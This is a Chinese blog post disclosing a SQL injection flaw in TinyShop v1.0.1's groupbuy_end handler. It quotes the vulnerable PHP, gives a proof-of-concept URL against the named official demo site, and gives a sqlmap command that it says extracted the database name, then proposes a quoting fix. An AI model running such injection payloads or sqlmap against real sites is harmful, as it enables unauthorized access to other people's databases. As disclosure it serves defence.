TinyShop v1.0.1 SQL注射 可致数据库信息泄露(官网演示+ 源码分析) 无视gpc 详细说明: /protected/controllers/ajax.php       //团购结束更新   public function groupbuy_end(){   $id = Req::args('id');                   //取得id   if($id){   $item = $this->model->table("groupbuy")->where("id=$id")->find();                   //无视GPC,直接带入查询          $end_diff = time()-strtotime($item['end_time']);          if($end_diff>0){   $this->model->table("groupbuy")->where("id=$id")->data(array('is_end'=>1))->update();   }   }       }         $id无单引号保护,因此无视GPC       何况官网没开GPC(框架里自动stripslashes先,开了也没用)       http://shop.tinyrise.com/ajax/groupbuy_end?id=4%27   TinyShop v1.0.1 SQL注射 可致数据库信息泄露 – 网站安插图     没有引号保护   SQLMAP   C:\Users\Administrator>sqlmap.py -u "http://shop.tinyrise.com/ajax/groupbuy_end?id=4" -p id --tables --delay=12    
TinyShop v1.0.1 SQL注射 可致数据库信息泄露 – 网站安插图1
TinyShop v1.0.1 SQL注射 可致数据库信息泄露 – 网站安插图2
TinyShop v1.0.1 SQL注射 可致数据库信息泄露 – 网站安插图3     都已经delay 12了 丢包还是惊人,不过还是跑出 数据库名了   修复方案: 单引号保护+addslashes
    上一篇: 贝因美多处安全漏洞可导致内网沦陷的 - 网站安

    下一篇: Python教程网络安全篇 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《TinyShop v1.0.1 SQL注射 可致数据库信息泄露 – 网站安
   

还没有人抢沙发呢~